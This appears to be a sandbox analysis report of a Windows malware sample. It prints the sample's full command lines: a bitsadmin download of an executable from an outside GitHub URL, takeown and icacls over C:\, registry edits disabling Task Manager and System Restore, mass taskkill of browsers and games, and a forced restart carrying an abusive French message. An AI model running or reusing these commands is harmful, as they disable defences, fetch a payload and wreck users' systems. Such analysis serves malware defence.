Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdfxml	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.bas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gif\OpenWithList\ehshell.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.gif\PersistentHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\.lst\PersistentHandler	reg.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2516	takeown.exe
Token: SeDebugPrivilege	2824	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	1800	taskkill.exe
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	2344	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	2208	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeShutdownPrivilege	716	shutdown.exe
Token: SeRemoteShutdownPrivilege	716	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1368 wrote to memory of 2180	1368	test.exe	30
PID 1368 wrote to memory of 2180	1368	test.exe	30
PID 1368 wrote to memory of 2180	1368	test.exe	30
PID 2180 wrote to memory of 2124	2180	cmd.exe	32
PID 2180 wrote to memory of 2124	2180	cmd.exe	32
PID 2180 wrote to memory of 2124	2180	cmd.exe	32
PID 2180 wrote to memory of 2516	2180	cmd.exe	34
PID 2180 wrote to memory of 2516	2180	cmd.exe	34
PID 2180 wrote to memory of 2516	2180	cmd.exe	34
PID 2180 wrote to memory of 2820	2180	cmd.exe	35
PID 2180 wrote to memory of 2820	2180	cmd.exe	35
PID 2180 wrote to memory of 2820	2180	cmd.exe	35
PID 2180 wrote to memory of 716	2180	cmd.exe	36
PID 2180 wrote to memory of 716	2180	cmd.exe	36
PID 2180 wrote to memory of 716	2180	cmd.exe	36
PID 2180 wrote to memory of 2456	2180	cmd.exe	37
PID 2180 wrote to memory of 2456	2180	cmd.exe	37
PID 2180 wrote to memory of 2456	2180	cmd.exe	37
PID 2180 wrote to memory of 1536	2180	cmd.exe	38
PID 2180 wrote to memory of 1536	2180	cmd.exe	38
PID 2180 wrote to memory of 1536	2180	cmd.exe	38
PID 2180 wrote to memory of 1620	2180	cmd.exe	39
PID 2180 wrote to memory of 1620	2180	cmd.exe	39
PID 2180 wrote to memory of 1620	2180	cmd.exe	39
PID 2180 wrote to memory of 2604	2180	cmd.exe	40
PID 2180 wrote to memory of 2604	2180	cmd.exe	40
PID 2180 wrote to memory of 2604	2180	cmd.exe	40
PID 2180 wrote to memory of 868	2180	cmd.exe	41
PID 2180 wrote to memory of 868	2180	cmd.exe	41
PID 2180 wrote to memory of 868	2180	cmd.exe	41
PID 2180 wrote to memory of 1600	2180	cmd.exe	42
PID 2180 wrote to memory of 1600	2180	cmd.exe	42
PID 2180 wrote to memory of 1600	2180	cmd.exe	42
PID 2180 wrote to memory of 276	2180	cmd.exe	43
PID 2180 wrote to memory of 276	2180	cmd.exe	43
PID 2180 wrote to memory of 276	2180	cmd.exe	43
PID 2180 wrote to memory of 2824	2180	cmd.exe	45
PID 2180 wrote to memory of 2824	2180	cmd.exe	45
PID 2180 wrote to memory of 2824	2180	cmd.exe	45
PID 2180 wrote to memory of 1636	2180	cmd.exe	47
PID 2180 wrote to memory of 1636	2180	cmd.exe	47
PID 2180 wrote to memory of 1636	2180	cmd.exe	47
PID 2180 wrote to memory of 1800	2180	cmd.exe	48
PID 2180 wrote to memory of 1800	2180	cmd.exe	48
PID 2180 wrote to memory of 1800	2180	cmd.exe	48
PID 2180 wrote to memory of 724	2180	cmd.exe	49
PID 2180 wrote to memory of 724	2180	cmd.exe	49
PID 2180 wrote to memory of 724	2180	cmd.exe	49
PID 2180 wrote to memory of 1892	2180	cmd.exe	50
PID 2180 wrote to memory of 1892	2180	cmd.exe	50
PID 2180 wrote to memory of 1892	2180	cmd.exe	50
PID 2180 wrote to memory of 1660	2180	cmd.exe	51
PID 2180 wrote to memory of 1660	2180	cmd.exe	51
PID 2180 wrote to memory of 1660	2180	cmd.exe	51
PID 2180 wrote to memory of 2428	2180	cmd.exe	52
PID 2180 wrote to memory of 2428	2180	cmd.exe	52
PID 2180 wrote to memory of 2428	2180	cmd.exe	52
PID 2180 wrote to memory of 2344	2180	cmd.exe	53
PID 2180 wrote to memory of 2344	2180	cmd.exe	53
PID 2180 wrote to memory of 2344	2180	cmd.exe	53
PID 2180 wrote to memory of 1500	2180	cmd.exe	54
PID 2180 wrote to memory of 1500	2180	cmd.exe	54
PID 2180 wrote to memory of 1500	2180	cmd.exe	54
PID 2180 wrote to memory of 2208	2180	cmd.exe	168

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C909.tmp\C90A.tmp\C90B.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Drops startup file
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    3⤵
    - Download via BitsAdmin
    PID:2124
- - C:\Windows\system32\takeown.exe
    takeown /f C:\*.*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- - C:\Windows\system32\icacls.exe
    Icacls C:\*.* /C /G Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2820
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:716
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2456
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2960.vbs"
    3⤵
    PID:1536
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14803.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:1620
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:2604
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:868
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2110.vbs"
    3⤵
    PID:1600
- - C:\Windows\system32\timeout.exe
    timeout 14
    3⤵
    - Delays execution with timeout.exe
    PID:276
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hl2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2824
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM javaw.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM RobloxPlayerBeta.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1800
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:724
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM GenshinImpact.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1892
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Among Us.exe
    3⤵
    - Kills process with taskkill
    PID:1660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\system32\shutdown.exe
    shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:716
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17270.vbs"
    3⤵
    - Blocklisted process makes network request
    - Enumerates connected drives
    PID:2916
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7654.vbs"
    3⤵
    - Enumerates connected drives
    PID:2772
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\18675.vbs"
    3⤵
    PID:2952
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15573.vbs" 10753.bat
    3⤵
    PID:2984
  - - C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10753.bat" "
      4⤵
      PID:2696
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2484
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1028
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2488
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:628
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2188
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2568
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2060
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2120
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2208
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1364
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:1852
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1464
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1988
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2784
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2788
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2832
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2804
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2692
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2648
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2700
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1744
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1584
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2828
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1588
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2508
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2724
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1552
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2308
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2720
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2244
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2332
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1868
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1892
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1692
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1984
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1272
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1672
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1716
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1780
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2900
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2904
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2776
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2920
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2632
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2736
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1744
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1584
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1520
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2984
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2304
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2204
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:784
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1120
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:448
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2568
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1608
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1420
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2060
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2120
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2728
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2936
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:328
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2928
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1856
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2700
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2056
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1220
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2464
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1052
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1916
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2308
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2296
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:1028
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1116
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2220
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1144
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2820
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2208
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:716
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2744
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2936
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2944
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2800
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2776
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:1052
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2808
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2984
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:1572
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1264
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9574.vbs"
        5⤵
        
        PID:2096
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        
        PID:2560
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        
        PID:2200
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
